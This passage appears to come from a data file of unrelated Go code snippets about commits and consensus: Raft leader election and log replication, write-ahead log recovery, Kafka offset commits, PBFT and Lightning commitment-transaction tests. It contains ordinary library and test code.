cs.staticWal.NewTransaction([]writeaheadlog.Update{validUpdate})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = <-txn.SignalSetupComplete()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Close the contract set.\n\tif err := cs.Close(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Load the set again. This should apply the valid update and not return an\n\t// error.\n\tcs, err = NewContractSet(testDir, rl, modules.ProdDependencies)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Make sure we can acquire the contract.\n\t_, ok = cs.Acquire(header.ID())\n\tif !ok {\n\t\tt.Fatal(\"failed to acquire contract after applying valid update\")\n\t}\n}", "func (tc *consumer) Commit(topic string, partition int32, offset int64) error {\n\treturn nil\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func TestCommitterSuccess(t *testing.T) {\n\te := []*transformer.Envelope{\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t}\n\n\tok := false\n\tc := NewCommitter(&dumbWriter{}, func(envs []*transformer.Envelope) error {\n\t\tok = len(envs) == len(e)\n\t\tfor i := range e {\n\t\t\tok = ok && (e[i] == envs[i])\n\t\t}\n\t\treturn nil\n\t})\n\n\terr := c.Write(e...)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error %v\", err)\n\t}\n\tif !ok {\n\t\tt.Fatal(\"commit callback not invoked correctly\")\n\t}\n}", "func TestCommitOverwrite4A(t *testing.T) {\n}", "func (et *explorerTester) testConsensusUpdates(t *testing.T) {\n\t// 20 here is arbitrary\n\tfor i := types.BlockHeight(0); i < 20; i++ {\n\t\tb, _ := et.miner.FindBlock()\n\t\terr := et.cs.AcceptBlock(b)\n\t\tif err != nil {\n\t\t\tet.t.Fatal(err)\n\t\t}\n\t}\n}", "func TestLogRecovery(t *testing.T) {\n\tpath := setupLog(\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 00000000000`)\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\n\t// Validate existing log entries.\n\tif len(log.entries) != 3 {\n\t\tt.Fatalf(\"Expected 2 entries, got %d\", len(log.entries))\n\t}\n\tif !reflect.DeepEqual(log.entries[0], NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})) {\n\t\tt.Fatalf(\"Unexpected entry[0]: %v\", log.entries[0])\n\t}\n\tif !reflect.DeepEqual(log.entries[1], NewLogEntry(log, 2, 1, &TestCommand2{100})) {\n\t\tt.Fatalf(\"Unexpected entry[1]: %v\", log.entries[1])\n\t}\n\tif !reflect.DeepEqual(log.entries[2], NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})) {\n\t\tt.Fatalf(\"Unexpected entry[2]: %v\", log.entries[2])\n\t}\n\n\t// Validate precommit log contents.\n\texpected :=\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Validate committed log contents.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected =\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`3f3f884c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bat\",\"i\":-5}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func (kvtx *KVtx) Commit(validateNum int) (success bool, txID int, err error) {\n\targs := &types.CommitArgs{UUID: UUID, ValidateNum: validateNum}\n\tvar replies []interface{}\n\tfor range kvtx.connection.clients {\n\t\treplies = append(replies, &types.CommitReply{Success: false})\n\t}\n\n\tmessageAllNodes(kvtx.connection.clients, \"ClientServer.Commit\", args, replies, true)\n\n\tfor _, reply := range replies {\n\t\tr := reply.(*types.CommitReply)\n\t\tif r.Success {\n\t\t\tsuccess = r.Success\n\t\t\ttxID = r.TxID\n\t\t\terr = nil\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn false, -1, errors.New(\"Unable to commit\")\n}", "func maybeCommit(c *kafka.Consumer, topicPartition kafka.TopicPartition) error {\n\t// Commit the already-stored offsets to Kafka whenever the offset is divisible\n\t// by 10, otherwise return early.\n\t// This logic is completely arbitrary. We can use any other internal or\n\t// external variables to decide when we commit the already-stored offsets.\n\tif topicPartition.Offset%10 != 0 {\n\t\treturn nil\n\t}\n\n\tcommitedOffsets, err := c.Commit()\n\n\t// ErrNoOffset occurs when there are no stored offsets to commit. This\n\t// can happen if we haven't stored anything since the last commit.\n\t// While this will never happen for this example since we call this method\n\t// per-message, and thus, always have something to commit, the error\n\t// handling is illustrative of how to handle it in cases we call Commit()\n\t// in another way, for example, every N seconds.\n\tif err != nil && err.(kafka.Error).Code() != kafka.ErrNoOffset {\n\t\treturn err\n\t}\n\n\tfmt.Printf(\"%% Commited offsets to Kafka: %v\\n\", commitedOffsets)\n\treturn nil\n}", "func TestCommit(t *testing.T) {\n\n\tif skipGdrive() != \"\" {\n\t\tt.Skip(skipGdrive())\n\t}\n\n\tvalidRoot := \"testdir\"\n\tdriver, err := gdriveDriverConstructor(validRoot)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error creating rooted driver: %v\", err)\n\t}\n\n\tfilename := \"/testfile\"\n\tctx := ctx.Background()\n\tdefaultChunkSize := 1000\n\tcontents := make([]byte, defaultChunkSize)\n\twriter, err := driver.Writer(ctx, filename, false)\n\tdefer driver.Delete(ctx, filename)\n\tif err != nil {\n\t\tt.Fatalf(\"driver.Writer: unexpected error: %v\", err)\n\t}\n\t_, err = writer.Write(contents)\n\tif err != nil {\n\t\tt.Fatalf(\"writer.Write: unexpected error: %v\", err)\n\t}\n\terr = writer.Commit()\n\tif err != nil {\n\t\tt.Fatalf(\"writer.Commit: unexpected error: %v\", err)\n\t}\n\terr = writer.Close()\n\tif err != nil {\n\t\tt.Fatalf(\"writer.Close: unexpected error: %v\", err)\n\t}\n\tif writer.Size() != int64(len(contents)) {\n\t\tt.Fatalf(\"writer.Size: %d != %d\", writer.Size(), len(contents))\n\t}\n\treadContents, err := driver.GetContent(ctx, filename)\n\tif err != nil {\n\t\tt.Fatalf(\"driver.GetContent: unexpected error: %v\", err)\n\t}\n\tif len(readContents) != len(contents) {\n\t\tt.Fatalf(\"len(driver.GetContent(..)): %d != %d\", len(readContents), len(contents))\n\t}\n}", "func (r *Raft) runLeader() {\n\tstate := leaderState{\n\t\tcommitCh: make(chan *DeferLog, 128),\n\t\treplicationState: make(map[string]*followerReplication),\n\t}\n\tdefer state.Release()\n\n\t// Initialize inflight tracker\n\tstate.inflight = NewInflight(state.commitCh)\n\n\tr.peerLock.Lock()\n\t// Start a replication routine for each peer\n\tfor _, peer := range r.peers {\n\t\tr.startReplication(&state, peer)\n\t}\n\tr.peerLock.Unlock()\n\n\t// seal leadership\n\tgo r.leaderNoop()\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase applyLog := <-r.applyCh:\n\t\t\t// Prepare log\n\t\t\tapplyLog.log.Index = r.getLastLogIndex() + 1\n\t\t\tapplyLog.log.Term = r.getCurrentTerm()\n\t\t\t// Write the log entry locally\n\t\t\tif err := r.logs.StoreLog(&applyLog.log); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to commit log: %w\", err)\n\t\t\t\tapplyLog.response = err\n\t\t\t\tapplyLog.Response()\n\t\t\t\tr.setState(Follower)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Add this to the inflight logs\n\t\t\tstate.inflight.Start(applyLog, r.quorumSize())\n\t\t\tstate.inflight.Commit(applyLog.log.Index)\n\t\t\t// Update the last log since it's on disk now\n\t\t\tr.setLastLogIndex(applyLog.log.Index)\n\n\t\t\t// Notify the replicators of the new log\n\t\t\tfor _, f := range state.replicationState {\n\t\t\t\tasyncNotifyCh(f.triggerCh)\n\t\t\t}\n\n\t\tcase commitLog := <-state.commitCh:\n\t\t\t// Increment the commit index\n\t\t\tidx := commitLog.log.Index\n\t\t\tr.setCommitIndex(idx)\n\n\t\t\t// Perform leader-specific processing\n\t\t\ttransition = r.leaderProcessLog(&state, &commitLog.log)\n\n\t\t\t// Trigger applying logs locally\n\t\t\tr.commitCh <- commitTuple{idx, commitLog}\n\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Leader state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func TestLogNewLog(t *testing.T) {\n\tpath := getLogPath()\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\t\n\tif err := log.Append(NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 2, 1, &TestCommand2{100})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bar\", 0})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\t\n\t// Partial commit.\n\tif err := log.SetCommitIndex(2); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected := \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Full commit.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to commit: %v\", err)\n\t}\n\texpected = \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bar\",\"i\":0}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func (r *Ring) CommittableOffset() int {\n\tif r.lowestPending < 0 {\n\t\treturn r.highestMarked\n\t}\n\treturn r.lowestPending - 1\n}", "func TestLeaderTransferBack(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership back to self.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (rf *Raft) updateLastCommit() {\n\t// rf.lock(\"updateLastCommit\")\n\t// defer rf.unlock(\"updateLastCommit\")\n\tmatchIndexCopy := make([]int, len(rf.matchIndex))\n\tcopy(matchIndexCopy, rf.matchIndex)\n\t// for i := range rf.matchIndex {\n\t//\tDPrintf(\"matchIndex[%d] is %d\", i, rf.matchIndex[i])\n\t// }\n\n\t// sort.Sort(sort.IntSlice(matchIndexCopy))\n\tsort.Sort(sort.Reverse(sort.IntSlice(matchIndexCopy)))\n\tN := matchIndexCopy[len(matchIndexCopy)/2]\n\t// for i := range rf.log {\n\t//\tDPrintf(\"server[%d] %v\", rf.me, rf.log[i])\n\t// }\n\t// for i := range rf.matchIndex {\n\t// \tDPrintf(\"server[%d]'s matchindex is %v\", i, rf.matchIndex[i])\n\t// }\n\t// Check\n\tN = Min(N, rf.getLastIndex())\n\n\tif N > rf.commitIndex && rf.log[N].LogTerm == rf.currentTerm && rf.state == LEADER {\n\t\trf.commitIndex = N\n\t\t// DPrintf(\"updateLastCommit from server[%d]\", rf.me)\n\t\trf.notifyApplyCh <- struct{}{}\n\n\t}\n\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (l *leader) applyCommitted() {\n\t// add all entries <=commitIndex & add only non-log entries at commitIndex+1\n\tvar prev, ne *newEntry = nil, l.neHead\n\tfor ne != nil {\n\t\tif ne.index <= l.commitIndex {\n\t\t\tprev, ne = ne, ne.next\n\t\t} else if ne.index == l.commitIndex+1 && !ne.isLogEntry() {\n\t\t\tprev, ne = ne, ne.next\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\tvar head *newEntry\n\tif prev != nil {\n\t\thead = l.neHead\n\t\tprev.next = nil\n\t\tl.neHead = ne\n\t\tif l.neHead == nil {\n\t\t\tl.neTail = nil\n\t\t}\n\t}\n\n\tapply := fsmApply{head, l.log.ViewAt(l.log.PrevIndex(), l.commitIndex)}\n\tif trace {\n\t\tprintln(l, apply)\n\t}\n\tl.fsm.ch <- apply\n}", "func TestNewCommits(t *testing.T) {\n\tos.Remove(\"/tmp/commits.log\")\n\n\tc, err := New(\"/tmp/commits.log\")\n\tcheck(err)\n\n\tcheck(c.Add(\"foo\"))\n\tcheck(c.Add(\"bar\"))\n\tcheck(c.Add(\"baz\"))\n\n\tcheck(c.Close())\n\tcheck(c.Open())\n\n\tassert.Equal(t, 3, c.Length())\n\tassert.Equal(t, true, c.Has(\"foo\"))\n\tassert.Equal(t, true, c.Has(\"bar\"))\n\tassert.Equal(t, true, c.Has(\"baz\"))\n\tassert.Equal(t, false, c.Has(\"something\"))\n}", "func (_RandomBeacon *RandomBeaconTransactorSession) SubmitRelayEntry(entry []byte, groupMembers []uint32) (*types.Transaction, error) {\n\treturn _RandomBeacon.Contract.SubmitRelayEntry(&_RandomBeacon.TransactOpts, entry, groupMembers)\n}", "func (s *PBFTServer) Commit(args CommitArgs, reply *CommitReply) error {\n\t// Verify signature\n\n\ts.lock.Lock()\n\n\ts.stopTimer()\n\n\tif !s.changing && s.view == args.View && s.h <= args.Seq && args.Seq < s.H {\n\t\tent := s.getEntry(entryID{args.View, args.Seq})\n\t\ts.lock.Unlock()\n\n\t\tent.lock.Lock()\n\t\tent.c = append(ent.c, &args)\n\t\tUtil.Dprintf(\"%s[R/Commit]:Args:%+v\", s, args)\n\t\tif !ent.sendReply && ent.sendCommit && s.committed(ent) {\n\t\t\tUtil.Dprintf(\"%s start execute %v @ %v\", s, ent.pp.Message.Op, args.Seq)\n\t\t\t// Execute will make sure there only one execution of one request\n\t\t\tres, _ := s.execute(args.Seq, ent.pp.Message.Op, args.Digest)\n\t\t\tif ent.r == nil {\n\t\t\t\trArgs := ResponseArgs{\n\t\t\t\t\tView: args.View,\n\t\t\t\t\tSeq: ent.pp.Message.Seq,\n\t\t\t\t\tCid: ent.pp.Message.Id,\n\t\t\t\t\tRid: s.id,\n\t\t\t\t\tRes: res,\n\t\t\t\t}\n\t\t\t\tent.r = &rArgs\n\t\t\t}\n\t\t\tent.sendReply = true\n\t\t}\n\t\ts.reply(ent)\n\t\tent.lock.Unlock()\n\t} else {\n\t\ts.lock.Unlock()\n\t}\n\treturn nil\n}", "func (m *Member) AppendEntry(leader string, term uint64, value int64, prevLogID int64) (bool, error) {\n\tlog.Infoln(\"Requesting log entry of\", m.Name, \"Value\", value)\n\tvar conn *grpc.ClientConn\n\tconn, err := grpc.Dial(m.Address(), grpc.WithInsecure())\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\tdefer conn.Close()\n\tapi := raftapi.NewRaftServiceClient(conn)\n\tctx := context.Background()\n\tresponse, err := api.AppendEntry(ctx, &raftapi.AppendEntryRequest{\n\t\tTerm: term,\n\t\tLeader: leader,\n\t\tPrevLogId: prevLogID,\n\t\tPrevLogTerm: term,\n\t\tEntry: &raftapi.LogEntry{\n\t\t\tTerm: term,\n\t\t\tValue: value,\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\n\treturn response.Success, nil\n}", "func TestCommitmentAndHTLCTransactions(t *testing.T) {\n\tt.Parallel()\n\n\ttc, err := newTestContext()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Generate random some keys that don't actually matter but need to be set.\n\tvar (\n\t\tidentityKey *btcec.PublicKey\n\t\tlocalDelayBasePoint *btcec.PublicKey\n\t)\n\tgenerateKeys := []**btcec.PublicKey{\n\t\t&identityKey,\n\t\t&localDelayBasePoint,\n\t}\n\tfor _, keyRef := range generateKeys {\n\t\tprivkey, err := btcec.NewPrivateKey(btcec.S256())\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Failed to generate new key: %v\", err)\n\t\t}\n\t\t*keyRef = privkey.PubKey()\n\t}\n\n\t// Manually construct a new LightningChannel.\n\tchannelState := channeldb.OpenChannel{\n\t\tChanType: channeldb.SingleFunderTweaklessBit,\n\t\tChainHash: *tc.netParams.GenesisHash,\n\t\tFundingOutpoint: tc.fundingOutpoint,\n\t\tShortChannelID: tc.shortChanID,\n\t\tIsInitiator: true,\n\t\tIdentityPub: identityKey,\n\t\tLocalChanCfg: channeldb.ChannelConfig{\n\t\t\tChannelConstraints: channeldb.ChannelConstraints{\n\t\t\t\tDustLimit: tc.dustLimit,\n\t\t\t\tMaxPendingAmount: lnwire.NewMSatFromSatoshis(tc.fundingAmount),\n\t\t\t\tMaxAcceptedHtlcs: input.MaxHTLCNumber,\n\t\t\t\tCsvDelay: tc.localCsvDelay,\n\t\t\t},\n\t\t\tMultiSigKey: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localFundingPubKey,\n\t\t\t},\n\t\t\tPaymentBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localPaymentBasePoint,\n\t\t\t},\n\t\t\tHtlcBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localPaymentBasePoint,\n\t\t\t},\n\t\t\tDelayBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: localDelayBasePoint,\n\t\t\t},\n\t\t},\n\t\tRemoteChanCfg: channeldb.ChannelConfig{\n\t\t\tMultiSigKey: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remoteFundingPubKey,\n\t\t\t},\n\t\t\tPaymentBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remotePaymentBasePoint,\n\t\t\t},\n\t\t\tHtlcBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remotePaymentBasePoint,\n\t\t\t},\n\t\t},\n\t\tCapacity: tc.fundingAmount,\n\t\tRevocationProducer: shachain.NewRevocationProducer(zeroHash),\n\t}\n\tsigner := &input.MockSigner{\n\t\tPrivkeys: []*btcec.PrivateKey{\n\t\t\ttc.localFundingPrivKey, tc.localPaymentPrivKey,\n\t\t},\n\t\tNetParams: tc.netParams,\n\t}\n\n\t// Construct a LightningChannel manually because we don't have nor need all\n\t// of the dependencies.\n\tchannel := LightningChannel{\n\t\tchannelState: &channelState,\n\t\tSigner: signer,\n\t\tcommitBuilder: NewCommitmentBuilder(&channelState),\n\t}\n\terr = channel.createSignDesc()\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to generate channel sign descriptor: %v\", err)\n\t}\n\n\t// The commitmentPoint is technically hidden in the spec, but we need it to\n\t// generate the correct tweak.\n\ttweak := input.SingleTweakBytes(tc.commitmentPoint, tc.localPaymentBasePoint)\n\tkeys := &CommitmentKeyRing{\n\t\tCommitPoint: tc.commitmentPoint,\n\t\tLocalCommitKeyTweak: tweak,\n\t\tLocalHtlcKeyTweak: tweak,\n\t\tLocalHtlcKey: tc.localPaymentPubKey,\n\t\tRemoteHtlcKey: tc.remotePaymentPubKey,\n\t\tToLocalKey: tc.localDelayPubKey,\n\t\tToRemoteKey: tc.remotePaymentPubKey,\n\t\tRevocationKey: tc.localRevocationPubKey,\n\t}\n\n\t// testCases encode the raw test vectors specified in Appendix C of BOLT 03.\n\ttestCases := []struct {\n\t\tcommitment channeldb.ChannelCommitment\n\t\thtlcDescs []htlcDesc\n\t\texpectedCommitmentTxHex string\n\t\tremoteSigHex string\n\t}{\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 7000000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 15000,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8002c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311054a56a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400473044022051b75c73198c6deee1a875871c3961832909acd297c6b908d59e3319e5185a46022055c419379c5051a78d00dbbce11b5b664a0c22815fbcc6fcef6b1937c383693901483045022100f51d2e566a70ba740fc5d8c0f07b9b93d2ed741c3c0860c613173de7d39e7968022041376d520e9c0e1ad52248ddf4b22e12be8763007df977253ef45a4ca3bdb7c001475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100f51d2e566a70ba740fc5d8c0f07b9b93d2ed741c3c0860c613173de7d39e7968022041376d520e9c0e1ad52248ddf4b22e12be8763007df977253ef45a4ca3bdb7c0\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 0,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 0,\n\t\t\t\t\tremoteSigHex: \"304402206a6e59f18764a5bf8d4fa45eebc591566689441229c918b480fb2af8cc6a4aeb02205248f273be447684b33e3c8d1d85a8e0ca9fa0bae9ae33f0527ada9c162919a6\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219700000000000000000001e8030000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402206a6e59f18764a5bf8d4fa45eebc591566689441229c918b480fb2af8cc6a4aeb02205248f273be447684b33e3c8d1d85a8e0ca9fa0bae9ae33f0527ada9c162919a60147304402207cb324fa0de88f452ffa9389678127ebcf4cabe1dd848b8e076c1a1962bf34720220116ed922b12311bd602d67e60d2529917f21c5b82f25ff6506c0f87886b4dfd5012000000000000000000000000000000000000000000000000000000000000000008a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a914b8bcb07f6344b42ab04250c86a6e8b75d3fdbbc688527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f401b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100d5275b3619953cb0c3b5aa577f04bc512380e60fa551762ce3d7a1bb7401cff9022037237ab0dac3fe100cde094e82e2bed9ba0ed1bb40154b48e56aa70f259e608b\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219701000000000000000001d0070000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d5275b3619953cb0c3b5aa577f04bc512380e60fa551762ce3d7a1bb7401cff9022037237ab0dac3fe100cde094e82e2bed9ba0ed1bb40154b48e56aa70f259e608b01483045022100c89172099507ff50f4c925e6c5150e871fb6e83dd73ff9fbb72f6ce829a9633f02203a63821d9162e99f9be712a68f9e589483994feae2661e4546cd5b6cec007be501008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"304402201b63ec807771baf4fdff523c644080de17f1da478989308ad13a58b51db91d360220568939d38c9ce295adba15665fa68f51d967e8ed14a007b751540a80b325f202\",\n\t\t\t\t\tresolutionTxHex: 